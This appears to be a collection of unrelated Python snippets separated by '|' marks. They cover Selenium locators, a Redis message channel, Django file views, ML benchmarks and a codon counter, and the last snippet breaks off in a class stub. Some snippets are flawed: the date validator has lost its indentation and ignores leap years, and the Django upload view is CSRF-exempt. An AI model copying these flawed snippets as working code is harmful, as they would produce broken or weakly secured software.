        "EXPLORE_WORLD_MAP": (By.CSS_SELECTOR,
                              'a[data-track="gnExploreWorldMapClick"]'),
        "EXPLORE_CAMERA_FINDER": (By.CSS_SELECTOR,
                                  'a['
                                  'data-track="gnExploreCameraFinderClick"]'),
        "EXPLORE_FLICKR_BLOG": (By.CSS_SELECTOR,
                                'a[data-track="gnExploreFlickrBlogClick"]')
    }

    # Navigation bar - Prints list
    ###############################
    PRINTS_LIST = (By.CSS_SELECTOR, 'li[data-context="create"]')
    PRINTS_LINK = (By.CSS_SELECTOR, 'a[data-track="gnCreateMainClick"]')
    PRINTS = {
        "PRINTS_PHOTO_BOOKS": (By.CSS_SELECTOR, 'a[href="/create"]'),
        "PRINTS_WALL_ARTS": (By.CSS_SELECTOR,
                             'a[aria-label="Prints & Wall Art"]')
    }

    # Navigation bar - Notification
    ################################
    NOTIF_MENU = (
        By.XPATH,
        '/html/body/div[1]/div/div[1]/div/div[3]/div/ul[2]/li[3]/div'
    )
    NOTIF_MENU_VIEW = (
        By.XPATH,
        '//div[contains(@class,"notifications-panel-view") '
        'and contains(@class,"view")]'
    )

    # Navigation bar - Account menu
    ################################
    ACCOUNT_MENU = (
        By.XPATH,
        'html/body/div[1]/div/div[1]/div/div[3]/div/ul[2]/li[4]/div'
    )
    ACCOUNT_MENU_VIEW = (
        By.XPATH,
        '//div[contains(@class,"user-account-card-view") '
        'and contains(@class,"view")]'
    )

    ####################################################
    #                   Feed Column                    #
    ####################################################
    # Filter container
    ################################
    FILTER_BUTTON = (By.CLASS_NAME, "filter-menu-button")
    FILTER_BUTTON_SPAN = (By.XPATH,
                          '//div[@class="filter-menu-button"]'
                          '/span[@class="filter-menu-text"]')
    filter_droparound_menu_xpath = '//div[contains(@class,"droparound") ' \
                                   'and contains(@class,"menu")]'
    FILTER = {
        "FILTER_ALL_ACTIVITY": (By.XPATH,
                                filter_droparound_menu_xpath +
                                '/div[2]/div/ul/li[1]'),
        "FILTER_PEOPLE": (By.XPATH,
                          filter_droparound_menu_xpath +
                          '/div[2]/div/ul/li[2]'),
        "FILTER_GROUPS": (By.XPATH,
                          filter_droparound_menu_xpath +
                          '/div[2]/div/ul/li[3]'),
        "FILTER_FRIENDS_FAMILY": (By.XPATH,
                                  filter_droparound_menu_xpath +
                                  '/div[2]/div/ul/li[4]')
    }

    # Layout tabs container
    ################################
    LAYOUT_COMPACT = (By.CSS_SELECTOR, 'a[data-layout-type="compact"]')
    LAYOUT_MEDIUM = (By.CSS_SELECTOR, 'a[data-layout-type="medium"]')
    LAYOUT_LARGE = (By.CSS_SELECTOR, 'a[data-layout-type="large"]')

    # FEED LOAD ERROR container
    ################################
    # FEED_LOAD_ERROR = (By.CLASS_NAME, "feed-load-error-container")
    FEED_LOAD_ERROR = (By.XPATH,
                       '//div[contains(@class,"feed-load-error-container")]')
    FEED_LOAD_ERRMSG = (By.XPATH,
                        '//div[@class="feed-load-error-container"]/div/h2')

    # feed column content
    ################################
    feed_column_content_xpath = '//div[@class="feed-column-content"]'
    # //div[feed-column-content]/div[feed-layout] (multiple)
    feed_layout_sub_xpath = '/div[@class="feed-layout"]'
    feed_layout_xpath = feed_column_content_xpath + feed_layout_sub_xpath
    # feed_layout_full_xpath = 'div/div'
    # //div[feed-column-content]/div[feed-layout]/div[feed_item] (multiple)
    feed_item_sub_xpath = '/div[@class="feed-item"]'
    feed_item_xpath = feed_layout_sub_xpath + feed_item_sub_xpath
    # //div[feed-column-content]/div[feed-layout]/div[feed_item]/div
    # /div[photo-card layout-medium]/
    photo_card_layout_sub_xpath = '/div/div'
    photo_card_layout_xpath = feed_item_xpath + photo_card_layout_sub_xpath
    # ---- Feed Post Header -----
    # //div[feed-column-content]/div[feed_layout]/div[feed-item]/div
    # /div[photo-card layout-medium]/header/div
    # /div[view photo-card-header-view flickr-view-root-view]
    # /div[photo-card-header ]
    photo_card_header_sub_xpath = \
        photo_card_layout_sub_xpath\
        + '/header/div/div/div'
    # ... /div[photo-card-header ]/div[left_container]
    photo_card_header_left_sub_xpath = \
        photo_card_header_sub_xpath + '/div[@class="left-container"]'
    # ... /div[photo-card-header ]/div[left_container]/a
    photo_card_icon_sub_xpath = \
        photo_card_header_left_sub_xpath + '/a'
    # ... /div[photo-card-header ]/div[left_container]/
    # div[attribution]/div[title_container]/a
    photo_card_poster_sub_xpath = \
        photo_card_header_left_sub_xpath +\
        '/div/div[@class="title-container"]/a'
    # ---- For Groups or compact layout photos -----
    # ... /div[feed-item]/div
    # /div[photo-card compact-large]/div[photo-card-content]
    # /div[card-batch-layout]/div[card-batch-photo-item] (multiple)
    group_batch_item_sub_xpath = \
        photo_card_layout_sub_xpath\
        + '/div[@class="photo-card-content"]' \
          '/div[@class="card-batch-layout"]/div'
    # ... /div[card-batch-photo-item]/div/div/div[photo-card-content]
    # /div[photo-card-photo]/div[photo]/a
    group_photo_link_sub_xpath = '/div/div/div/div/div[@class="photo"]/a'
    # ---- For Medium/Large photos ----
    # ... /div[feed-item]/div
    # /div[photo-card compact-large]/div[photo-card-content]
    # /div[photo-card-photo]/div[photo]/a
    # Bug fix: the closing ']' of the @class predicate was misplaced at the
    # very end of the expression ('...photo-card-content"/div/div/a]'),
    # which is not valid XPath; the predicate now closes after the class.
    photo_link_sub_xpath = \
        photo_card_layout_xpath + \
        '/div[@class="photo-card-content"]/div/div/a'

    ####################################################
    #                   Info Column                    #
    ####################################################
    # Slim Footer
    ################################
    FOOTER = {
        "FOOTER_ABOUT": (By.CSS_SELECTOR, 'a[data-track="footer-about"]'),
        "FOOTER_JOBS": (By.CSS_SELECTOR, 'a[data-track="footer-jobs"]'),
        "FOOTER_BLOG": (By.CSS_SELECTOR, 'a[data-track="footer-blog"]'),
        "FOOTER_DEVELOPERS": (By.CSS_SELECTOR,
                              'a[data-track="footer-developers"]'),
        # NOTE(review): same selector as FOOTER_DEVELOPERS -- probably meant
        # "footer-guidelines"; confirm against the page markup before changing.
        "FOOTER_GUIDELINES": (By.CSS_SELECTOR,
                              'a[data-track="footer-developers"]'),
        "FOOTER_HELP": (By.CSS_SELECTOR, 'a[data-track="footer-help"]'),
        "FOOTER_FORUM": (By.CSS_SELECTOR, 'a[data-track="footer-forum"]'),
        "FOOTER_PRIVACY": (By.CSS_SELECTOR, 'a[data-track="footer-privacy"]'),
        "FOOTER_TERMS": (By.CSS_SELECTOR, 'a[data-track="footer-terms"]'),
        "FOOTER_COOKIES": (By.CSS_SELECTOR, 'a[href="/help/cookies"]')
    }
}
|
import sys
import json
import base64
from datetime import datetime
# Py2: identity; Py3: encode str to ASCII bytes (old `and/or` ternary idiom).
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('ascii'))
class JsonSerializationMixin(object):
    """ Transforms objects mainly Entity or ValueObject to JSON """

    def to_dict(self):
        """ searches a get-methods in object and fires them """
        # 'get_status_code' -> 'status_code'; names without '_' pass through.
        field_name = lambda s: s.split('_', 1)[1] if '_' in s else s

        def _parse(_field):
            # Only attributes named get_* are treated as serializable
            # fields; anything else yields None and is filtered out below.
            if _field.startswith('get_'):
                field = field_name(_field)
                value = getattr(self, _field)()
                # Recurse into nested serializable objects and lists.
                if hasattr(value, 'to_dict'):
                    value = getattr(value, 'to_dict')()
                if isinstance(value, list):
                    value = list(map(lambda obj: obj.to_dict()
                                     if hasattr(obj, 'to_dict') else obj,
                                     value))
                # Digit-only strings/bytes are coerced to int.
                if isinstance(value, (str, bytes)) and value.isdigit():
                    value = int(value)
                if isinstance(value, bytes):
                    try:
                        value = _b(value)
                    except Exception:
                        # Not ASCII-encodable: fall back to base64 text.
                        value = _b(base64.standard_b64encode(value))
                return field, value

        # map() yields (field, value) pairs or None; filter drops the Nones.
        return dict(filter(lambda x: x, map(_parse, dir(self))))
class ValueObject(JsonSerializationMixin):
    """Marker base class for JSON-serializable value objects."""
    pass
class LogLevel(ValueObject):
    # Severity codes: lower means more severe (inverse of stdlib logging).
    critical = 0
    error = 10
    warning = 20
    info = 30
    debug = 100
class LogMessage(ValueObject):
    """ The log message. Used mainly as a contract.

    Fields are exposed through get_*/set_* accessors so that
    JsonSerializationMixin.to_dict() can discover and serialize them.
    """

    __log_type__ = None
    __object_name__ = None
    __object_id__ = None
    __level__ = None
    __status_code__ = None
    # NOTE(review): __msg__ is declared but never set by any method.
    __msg__ = None
    __datetime__ = None

    LOG_LEVEL = LogLevel

    def __init__(self, log_type=None, object_name=None, object_id=None,
                 level=None, status_code=None, datetime=None,
                 *args, **kwargs):
        # Extra positional/keyword arguments are accepted (and ignored) so
        # the object can be built straight from a LogRecord's __dict__.
        self.set_type(log_type)
        self.set_level(level)
        self.set_object_name(object_name)
        self.set_object_id(object_id)
        self.set_status_code(status_code)
        self.set_datetime(datetime)

    def set_type(self, log_type):
        self.__log_type__ = log_type

    def get_type(self):
        return self.__log_type__

    def set_object_name(self, s):
        self.__object_name__ = s

    def get_object_name(self):
        return self.__object_name__

    def set_object_id(self, s):
        self.__object_id__ = s

    def get_object_id(self):
        return self.__object_id__

    def set_level(self, level):
        self.__level__ = level

    def get_level(self):
        return self.__level__

    def set_status_code(self, status_code):
        self.__status_code__ = status_code

    def get_status_code(self):
        return self.__status_code__

    def set_datetime(self, t):
        """Store *t* as text; None means "now", numbers are UNIX timestamps."""
        if t is None:
            t = str(datetime.now())
        elif isinstance(t, (int, float)):
            try:
                t = str(datetime.fromtimestamp(t))
            except (OverflowError, OSError, ValueError):
                # Out-of-range timestamp: keep the raw number as-is.
                # (Fix: the bare `except:` here also swallowed e.g.
                # KeyboardInterrupt.)
                pass
        self.__datetime__ = t

    def get_datetime(self):
        return self.__datetime__

    @classmethod
    def from_log_record(cls, record):
        """
        :type record: logging.LogRecord
        NOTE(review): LogRecord has levelno/levelname, not 'level', so the
        level field presumably stays None here -- confirm.
        """
        return cls(**record.__dict__)

    def __str__(self):
        # Bug fix: this called self.get_log_type(), which does not exist
        # (the accessor is get_type), so str() raised AttributeError.
        return '<{}: {}>'.format(self.__class__.__name__, self.get_type())
class AbstractChannel(object):
    """Interface for message channels; concrete channels implement send()."""

    def send(self, message):
        # Deliberately unimplemented -- subclasses must override.
        raise NotImplementedError()
class BaseChannel(AbstractChannel):
    """ Data channel abstraction.
    """
    name = 'default'

    def __init__(self, name, mq=None, respond_to=None):
        """
        :type mq: redis.StrictRedis
        :type respond_to: Channel
        """
        self.mq = mq
        self.name = name
        self.send_channel = respond_to

    def __postproc_msg(self, fun, data):
        """Decode *data* to text if it is bytes, then apply *fun* to it.

        :type fun: types.FunctionType
        :type data: bytes
        Exceptions raised while processing (such as ValueError) propagate
        to the caller -- don't hesitate to catch them.
        """
        text = str(data, 'utf-8') if isinstance(data, bytes) else data
        return fun(text)

    def send(self, message):
        """Serialize *message* to JSON and publish it on this channel.

        :type message: dict
        """
        payload = self.__postproc_msg(json.dumps, message)
        return self.mq.publish(self.name, payload)

    def __str__(self):
        return '<{} queue name: {} >'.format(self.__class__.__name__,
                                             self.name)
class Channel(BaseChannel):
    """ Results Channel
    """
    name = 'results'

    def transform_fields(self, message):
        """Convert *message* to a plain dict when it supports to_dict()."""
        return message.to_dict() if hasattr(message, 'to_dict') else message

    def send(self, message):
        """
        :type message: ValueObject
        """
        payload = self.transform_fields(message)
        return super(Channel, self).send(payload)
|
#I pledge my honor I have abided by the Stevens Honor System
#This program will accept a date in the format month/day/year
#It will then determine whether or not the date is valid
def main():
print("This program determines whether or not an entered date is valid.")
print("When prompted enter your date in the format month/day/year. Ex: 8/22/2014")
date = input("Enter the date you would like to validate: ")
month,day,year= date.split('/')
month = int(month)
day = int(day)
year= int(year)
date = print(month, "/", day, "/", year)
if month == 1 and day >= 1 and day <= 31 and year > 0:
print("Your date is valid.")
elif month == 2 and day >= 1 and day <= 28 and year > 0:
print("Your date is valid.")
elif month == 3 and day >= 1 and day <= 31 and year > 0:
print("Your date is valid.")
elif month == 4 and day >= 1 and day <= 30 and year > 0:
print("Your date is valid.")
elif month == 5 and day >= 1 and day <= 31 and year > 0:
print("Your date is valid.")
elif month == 6 and day >= 1 and day <= 30 and year > 0:
print("Your date is valid.")
elif month == 7 and day >= 1 and day <= 31 and year > 0:
print("Your date is valid.")
elif month == 8 and day >= 1 and day <= 31 and year > 0:
print("Your date is valid.")
elif month == 9 and day >= 1 and day <= 30 and year > 0:
print("Your date is valid.")
elif month == 10 and day >= 1 and day <= 31 and year > 0:
print("Your date is valid.")
elif month == 11 and day >= 1 and day <= 30 and year > 0:
print("Your date is valid.")
elif month == 12 and day >= 1 and day <= 31 and year > 0:
print("Your date is valid.")
else:
print("Your date is invalid.")
main() |
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
import pandas as pd
import mglearn
import sklearn
import scipy as sp
import sys
# Report the interpreter and key library versions ("버전" is Korean for
# "version").
print("Python 버전 :{}".format(sys.version))
print("Python pandas 버전 :{}".format(pd.__version__))
print("Python matplotlib 버전 :{}".format(matplotlib.__version__))
print("Python numpy 버전 :{}".format(np.__version__))
print("Python scipy 버전 :{}".format(sp.__version__))
print("Python sklearn 버전 :{}".format(sklearn.__version__))
|
def testData():
    """Run runCode() on the sample grid and compare with the known answer.

    Reads the example input from test.txt and its expected result from
    answer.txt; returns True when runCode reproduces the answer.
    """
    # NOTE(review): the file handles are never closed; prefer `with open(...)`.
    otest = open('test.txt', 'r')
    test = otest.readlines()
    oanswer = open('answer.txt', 'r')
    answer = oanswer.readline()
    status = False
    print("Runs test data")
    result = runCode(test)
    if result == int(answer): #not always int
        status = True
    print("Correct answer: " + answer + "My answer: " + str(result))
    return status
def runCode(data):
    """Count trees hit on each toboggan slope and return their product.

    *data* is the grid as a list of text lines where '#' marks a tree; the
    pattern repeats infinitely to the right (Advent of Code 2020, day 3).
    Prints the per-slope tree count as it goes, as before.
    """
    print("Runs code")
    # (right, down) step for each slope to evaluate.
    patterns = [(1, 1), (3, 1), (5, 1), (7, 1), (1, 2)]
    total_trees = 1
    for right, down in patterns:
        position = 0
        trees = 0
        # Start one step down from the top, then advance `right` columns
        # per visited row.
        for i in range(down, len(data), down):
            line = data[i].strip()
            position += right
            # Robustness fix: wrap with modulo instead of a single
            # subtraction, which only worked while the step stayed within
            # one extra row width.
            position %= len(line)
            if line[position] == '#':
                trees += 1
        print(trees)
        total_trees = trees * total_trees
    return total_trees
#Runs testdata first; only attempt the real puzzle once the sample passes.
testResult = testData()
if testResult == True:
    print("Test data parsed. Tries to run puzzle.")
    # NOTE(review): handle is never closed; prefer `with open(...)`.
    opuzzle = open('input.txt', 'r')
    puzzle = opuzzle.readlines()
    finalResult = runCode(puzzle)
    print(finalResult)
else:
    print("Test data failed. Code is not correct. Try again.")
|
import os, argparse, json, random, time
import torch
import numpy as np
def int_list(s):
    """Parse a comma-separated string such as '1,2,4' into a list of ints."""
    return list(map(int, s.split(',')))
# Benchmark sweep configuration: batch sizes (N), category counts (C) and
# sample counts (S), each given as a comma-separated list.
parser = argparse.ArgumentParser()
parser.add_argument('--N', type=int_list,
                    default=[1, 2, 4, 8, 16, 32, 64, 128])
parser.add_argument('--C', type=int_list,
                    default=[10, 100, 1000, 10000, 100000])
parser.add_argument('--S', type=int_list,
                    default=[10, 100, 1000, 10000, 100000])
# 1 = sample with replacement, 0 = without.
parser.add_argument('--with_replacement', type=int, default=1)
parser.add_argument('--num_trials', type=int, default=5)
parser.add_argument('--stats_json', default='multinomial_stats.json')
def main(args):
    """Sweep every (N, C, S) combination and dump per-trial timings to JSON."""
    replacement = args.with_replacement == 1
    all_results = []
    for n, N in enumerate(args.N):
        print('Running N = %d (value %d / %d)' % (N, n + 1, len(args.N)))
        for c, C in enumerate(args.C):
            print(' Running C = %d (value %d / %d)' % (C, c + 1, len(args.C)))
            for s, S in enumerate(args.S):
                print(' Running S = %d (value %d / %d)' % (S, s + 1, len(args.S)))
                # One result record per configuration; each backend key
                # collects num_trials timing samples in milliseconds.
                cur_results = {
                    'N': N, 'C': C, 'S': S,
                    'torch_cpu': [], 'torch_gpu': [], 'numpy_cpu': [], 'numpy_gpu': []
                }
                for t in range(args.num_trials):
                    times = run_trial(N, C, S, replacement)
                    for key, time_ms in times.items():
                        cur_results[key].append(time_ms)
                all_results.append(cur_results)
    with open(args.stats_json, 'w') as f:
        json.dump(all_results, f)
def timeit(f, *args, **kwargs):
    """Time a single call of ``f`` in milliseconds.

    CUDA is synchronized before and after the call so asynchronous GPU
    kernels are fully accounted for in the measurement.
    """
    torch.cuda.synchronize()
    start = time.time()
    f(*args, **kwargs)
    torch.cuda.synchronize()
    return (time.time() - start) * 1000.0
def numpy_multinomial(probs, num_samples, replacement=True):
    """np.random.choice-based counterpart of torch.multinomial.

    Args:
        probs: (N, C) tensor whose rows are categorical distributions.
        num_samples: number of draws per row.
        replacement: sample with or without replacement.

    Returns:
        (N, num_samples) LongTensor on the same device as ``probs``.
    """
    probs_np = probs.cpu().numpy()
    num_categories = probs_np.shape[1]
    # One np.random.choice call per row, in row order.
    rows = [np.random.choice(num_categories, size=num_samples,
                             replace=replacement, p=row)
            for row in probs_np]
    stacked = np.stack(rows, axis=0)
    return torch.tensor(stacked).long().to(probs.device)
def run_trial(N, C, S, replacement=True):
    """Time torch/numpy multinomial sampling on CPU and GPU for one config.

    The four backend calls are shuffled so systematic ordering effects
    (caching, clock warm-up, etc.) are minimized.

    Returns:
        dict mapping backend name -> elapsed time in milliseconds.
    """
    probs_cpu = torch.rand(N, C).softmax(dim=1)
    probs_gpu = probs_cpu.cuda()
    kwargs = {'replacement': replacement}
    calls = [
        ('torch_cpu', torch.multinomial, (probs_cpu, S), kwargs),
        ('torch_gpu', torch.multinomial, (probs_gpu, S), kwargs),
        ('numpy_cpu', numpy_multinomial, (probs_cpu, S), kwargs),
        ('numpy_gpu', numpy_multinomial, (probs_gpu, S), kwargs),
    ]
    random.shuffle(calls)
    return {name: timeit(fn, *fn_args, **fn_kwargs)
            for name, fn, fn_args, fn_kwargs in calls}
# Script entry point: parse CLI arguments and launch the benchmark sweep.
if __name__ == '__main__':
  args = parser.parse_args()
  main(args)
|
choicify = lambda lst: [(s, s) for s in lst]
|
#coding:utf-8
from django.shortcuts import render_to_response
from django.template.context import RequestContext
from django.http.response import HttpResponse, StreamingHttpResponse
import json
from resources.dao import select_resources, uploadFile,\
select_Cresource, rsUpdateDao
from django.views.decorators.csrf import csrf_exempt
from subject.models import User, Source
from activity.dao import activityDao
from login.dao import userDao
from subject import settings
def into_resources(req):
    """Render the resources page with the standard request context."""
    return render_to_response('resources.html',RequestContext(req))
def get_resources(req):
    """Return one page of resources as JSON.

    GET parameter 'p' is the requested page number; page 0 is treated as
    page 1 and additionally includes the total resource count as 'numT'.
    If a 'userid' cookie is present it is forwarded to personalize the query.
    """
    p = int(req.GET.get('p'))
    cur = p
    rs = {}
    if p == 0:
        cur = 1
        cn = select_Cresource()
        rs['numT'] = cn
    us = None
    # 'in' instead of dict.has_key(): has_key() was removed in Python 3,
    # while the membership operator works on both 2 and 3.
    if "userid" in req.COOKIES:
        us = req.COOKIES["userid"]
    rs['res'] = select_resources(cur, us)
    return HttpResponse(json.dumps(rs), content_type="application/json")
@csrf_exempt
def upload_resources(req):
    """Handle an authenticated file upload (Python 2 code path).

    Requires the 'userid' cookie; stores the uploaded file together with its
    point cost, records an activity entry, and returns a JSON tip message.
    """
    if req.COOKIES.has_key('userid'):  # Python 2 idiom; this module targets Py2
        file = req.FILES['uploadedfile'] # @ReservedAssignment
        points = req.POST['points']
        # filename arrives as unicode; downstream expects utf-8 bytes
        filename = req.POST['filename'].encode('utf-8')
        if file:
            # decode/encode round-trip normalizes the cookie value to utf-8 bytes
            userid = req.COOKIES['userid'].decode('utf-8').encode('utf-8')
            uploadFile({'userid':userid,'file':file,'filename':filename,'points':points})
            content = ' 上传资源:' + filename
            ADao = activityDao({"userid":userid})
            ADao.add_a_activity(content.decode('utf-8'))
            return HttpResponse(json.dumps({'tips':'上传成功'}),content_type="application/json")
    return HttpResponse(json.dumps({'tips':'上传失败or未登录'}),content_type="application/json")
'''
下载时的积分处理:
1.获取登录信息:成功,下一步;失败,返回错误信息
2.获取传递参数
3.判断下载者积分:充足,下一步;否,返回错误信息
4.减少下载者积分,增加上传者积分
5.返回空白json
'''
# @csrf_exempt
def download_resources(req):
    """Stream a resource file to a logged-in user, transferring points.

    Flow: verify login cookie -> load the resource and its point cost ->
    check the downloader's balance -> debit downloader / credit uploader ->
    bump the download counter and log the activity -> stream the file as an
    attachment.  Plain-text errors are returned for insufficient points or
    a missing login.
    """
    if 'userid' in req.COOKIES:  # 'in' works on Py2 and Py3; has_key() does not
        resourceID = int(req.GET.get('rs'))
        downloader = req.COOKIES['userid']
        dao = Source.objects.get(id=resourceID)
        downloadPoint = dao.points
        uploader = dao.userid
        if User.objects.filter(id=downloader, points__gte=downloadPoint):
            # debit the downloader
            dao = userDao({'userid': downloader})
            dao.update_point_byReq({'method': '-', 'points': downloadPoint})
            dao.save_update()
            # credit the uploader
            dao = userDao({'us': uploader})
            dao.update_point_byReq({'method': '+', 'points': downloadPoint})
            dao.save_update()
            # bump the resource's download counter
            dao = rsUpdateDao(rsid=resourceID)
            dao.update_content()
            dao.update_save()
            content = (' 下载资源: ').decode("utf-8") + dao.rs.download
            downloadPath = settings.MEDIA_ROOT + dao.rs.download
            ADao = activityDao({"userid": downloader})
            ADao.add_a_activity(content)
            def file_iterator(file_name, chunk_size=512):
                # 'rb' is required: the payload is served as an octet-stream;
                # text mode would corrupt binary files on Windows.  The
                # with-block also closes the handle the original leaked.
                with open(file_name, 'rb') as f:
                    while True:
                        c = f.read(chunk_size)
                        if c:
                            yield c
                        else:
                            break
            response = StreamingHttpResponse(file_iterator(downloadPath))
            response['Content-Type'] = 'application/octet-stream'
            response['Content-Disposition'] = 'attachment;filename="{0}"'.format(dao.rs.download)  # default download file name
            return response
        return HttpResponse('积分不足')
    return HttpResponse('请先登录')
# coding: utf-8
def retrain(data):
    """
    Retrain the xgboost model, warm-starting from the latest saved model.

    ``data`` rows are [label, feature_1, ..., feature_n].  Model versions
    live in timestamped child directories:

    /var/opt/xgboost
    |- 00000000000/
        |- model
        |- lock
    |- 11397283704/
    ...
    """
    import xgboost as xgb
    import numpy as np
    from os.path import abspath, dirname, join
    import sys
    # Make the sibling 'modules' directory importable just long enough to
    # pull in utils, then restore sys.path.
    sys.path.insert(0, join(dirname(dirname(abspath(__file__))), 'modules'))
    import utils
    sys.path.pop(0)
    XGBOOST_DIR = '/var/opt/xgboost'
    latest_dir = utils.get_latest_dir(XGBOOST_DIR)
    if latest_dir is not None:
        # Warm start from the most recently committed model, if any.
        base_model = xgb.Booster()
        base_model.load_model('{}/model'.format(latest_dir))
    else:
        base_model = None
    # retrain model: column 0 is the label, the remaining columns are features
    X = np.array([d[1:] for d in data])
    y = np.array([d[0] for d in data])
    dataset = xgb.DMatrix(X, label=y)
    params = {
        'max_depth': 5,
        'eta': 0.1,
        'objective': 'binary:logistic',
        'silent': 0
    }
    # 30 boosting rounds, continuing from base_model when available.
    model = xgb.train(params, dataset, 30, [], xgb_model=base_model)
    # save model into a fresh child dir, then commit it
    new_dir = utils.create_child_dir(XGBOOST_DIR)
    model.save_model('{}/model'.format(new_dir))
    import time
    # NOTE(review): the 10 s sleep before committing the directory looks like
    # a crude settle delay for readers/filesystem — confirm the intent.
    time.sleep(10)
    utils.commit_dir(new_dir)
def fetch():
    """Placeholder for fetching training data; not implemented yet (TODO)."""
    pass
def main(rpc_service,
         continuum_host='localhost',
         continuum_port=7001,
         redis_host='localhost',
         redis_port=6379,
         backend_name='xgboost',
         backend_version='1.0',
         backend_module='xgboost_entries',
         app_name='xgboost-app',
         policy_name='NaiveBestEffortPolicy',
         input_type='doubles',
         params=None,
         **kwargs):
    """Register and start the xgboost RPC backend service.

    Args:
        rpc_service: service object exposing ``start(...)``.
        params: optional dict of policy parameters; 'alpha' defaults to 4.0
            and 'beta' to 10000.0 when absent.  Extra **kwargs are accepted
            and ignored.
    """
    # BUG FIX: the original used a mutable default (params={}) and mutated
    # it, so defaults were shared and accumulated across calls.  A None
    # sentinel avoids that; explicitly passed dicts are still updated in
    # place, preserving the original call-site behavior.
    if params is None:
        params = {}
    params.setdefault('alpha', 4.0)
    params.setdefault('beta', 10000.0)
    rpc_service.start(continuum_host, continuum_port, backend_name, backend_version, redis_host,
                      redis_port, backend_module, app_name, policy_name, input_type, params)
|
# Read this https://docs.python.org/3/howto/sorting.html
# Sort examples, from above link. For my own silly testing.
from operator import itemgetter, attrgetter
student_tuples = [('john', 'A', 15), ('jane', 'B', 12), ('dave', 'B', 10)]
# sorted_list = sorted(student_tuples, key=lambda student: student[2])
# itemgetter(2) selects the age field, equivalent to the lambda above.
sorted_list = sorted(student_tuples, key=itemgetter(2))
print("Sorted with tuples: " + str(sorted_list))
class Student:
    """Simple student record used by the sorting demos below."""

    def __init__(self, name, grade, age):
        self.name, self.grade, self.age = name, grade, age

    def __repr__(self):
        # Mirror the tuple form so sorted output matches the tuple examples.
        return repr((self.name, self.grade, self.age))
# Sorting class instances: attrgetter('age') mirrors the lambda on .age.
student_objects = [Student('john', 'A', 15), Student('jane', 'B', 12), Student('dave', 'B', 10)]
# object_sorted_list = sorted(student_objects, key=lambda student: student.age)
object_sorted_list = sorted(student_objects, key=attrgetter('age'))
print("Sorting objects: " + str(object_sorted_list))
# multi_sorted = sorted(student_tuples, key=itemgetter(1,2))
# attrgetter with two names sorts by age first, then grade as tiebreaker.
multi_sorted = sorted(student_objects, key=attrgetter('age', 'grade'))
print("Multiple sorts looks like this: " + str(multi_sorted))
|
#IanNolon
#4/26/28
#vowelWordDemo.py- treat strings as lists
# Prompt for a space-separated list of words and echo only the words that
# begin with a vowel (either case).
words = input('Type in a list of words: ').split(' ')
for w in words:
    if w[0] in 'AEIOUaeiou': # if the word starts with a vowel
        print(w)
|
#!/usr/bin/env python
# coding: utf-8
import sklearn
import joblib
from sklearn.datasets import make_classification
# Synthetic 10-class dataset: 10k samples, 75 features (55 informative, 10 redundant).
dataset = make_classification(n_samples=10000, n_features=75, n_informative=55, n_redundant=10, n_classes=10)
from sklearn.ensemble import RandomForestClassifier
# NOTE: 30000 trees at depth 50 is a deliberately heavy model; both training
# time and the dumped 'rf.joblib' file will be very large.
rf_model = RandomForestClassifier(n_estimators=30000, max_depth=50, n_jobs=-1)
rf_model.fit(dataset[0], dataset[1])
# Persist the fitted model for later reuse.
joblib.dump(rf_model, 'rf.joblib')
|
#Auteur Tom
import os
from tkinter.filedialog import askdirectory
import pickle
import matplotlib.pyplot as plt
import re
def openfiles():
    '''
    Ask the user for a folder and search it recursively for files.
    When the search term (variable searchterm) appears in a file name,
    the file path is handed to the readfiles function.
    '''
    searchterm = "CDS.fasta" #input("What should be in the file name?: ")
    for path, dirs, files in os.walk(askdirectory()):
        for subfile in files:
            if searchterm in subfile:
                # NOTE(review): the literal backslash separator is
                # Windows-style, but readfiles() relies on splitting the path
                # on '\\' to recover the bare file name — the two functions
                # must be changed together if this is ever made portable.
                newpath = path + "\\" + subfile
                readfiles(newpath)
def readfiles(filepath):
    """Open one FASTA file and split it into headers and sequences.

    Header lines (starting with '>') are collected in one list; the sequence
    lines between headers are concatenated into single entries of a parallel
    list.  Both lists, together with the bare file name, are passed on to
    codoncounter().
    """
    headers = []
    seqs = []
    buffer = ''
    with open(filepath) as fastafile:
        for line in fastafile:
            stripped = line.rstrip()
            if stripped.startswith('>'):
                headers.append(stripped)
                if buffer:
                    seqs.append(buffer)
                    buffer = ''
            else:
                buffer += stripped
    seqs.append(buffer)
    # The file name is recovered by splitting on '\\' because openfiles()
    # joins paths with a literal backslash.
    codoncounter(headers, seqs, filepath.split('\\')[-1])
def codoncounter(headers, seqs, filename):
    '''
    Accepts a header list and a sequence list together with the file name.
    Using a codon dictionary (loaded from CodonDict.dat) every sequence is
    scanned codon by codon; each codon found is appended, grouped per amino
    acid, to a usage dictionary (template loaded from TemplateDict.dat).
    The resulting dictionary is passed on to dictprocessor() for further
    processing and sorting.
    '''
    start = 0
    stop = 3
    headercount = 0
    # Both .dat files are pickled dictionaries expected in the working dir.
    with open("TemplateDict.dat", "rb") as usagefile:
        usagedict = pickle.load(usagefile)
    with open("CodonDict.dat","rb") as CodonFile:
        codonDict = pickle.load(CodonFile)
    for seq in seqs:
        seq = seq.lower()
        if re.search("gene=env", headers[headercount]) == None: # adjust this check when searching for ENV or something else
            # walk the sequence in steps of 3, ignoring a trailing partial codon
            for x in range(int((len(seq)-len(seq)%3)/3)):
                for key in codonDict:
                    if key == seq[start:stop]:
                        try:
                            usagedict[codonDict[key]].append("{} {}".format(codonDict[key], key))
                        except KeyError:
                            usagedict[codonDict[key]] = ["{} {}".format(codonDict[key], key)]
                        start+=3
                        stop +=3
                        break
        headercount += 1
        # reset the sliding window for the next sequence
        start = 0
        stop = 3
    dictprocessor(usagedict, "="*40, filename)
def dictprocessor(usagedict, header, filename):
    """Reduce the raw usage dictionary to sorted (codons, counts) pairs.

    For every amino-acid key the unique codon strings are sorted
    alphabetically and paired with their occurrence counts, producing
    key: ([codon_strings], [counts]) — a shape convenient for matplotlib.
    The result is forwarded to pickledump().
    """
    sorteddict = {}
    for aa in usagedict:
        entries = usagedict[aa]
        codons = sorted(set(entries))
        counts = [entries.count(codon) for codon in codons]
        sorteddict[aa] = codons, counts
    pickledump(sorteddict, header, filename)
def pickledump(codondict, header, filename):
    """Write the processed codon dictionary to a pickle file.

    The output name embeds the source file name without its extension,
    e.g. 'sample.fasta' -> 'CodonUsageDict sample.dat'.
    """
    outname = "CodonUsageDict {}.dat".format(filename.split('.')[0])
    with open(outname, "wb") as outfile:
        pickle.dump(codondict, outfile)
openfiles()
|
import pandas as pd
class InputData:
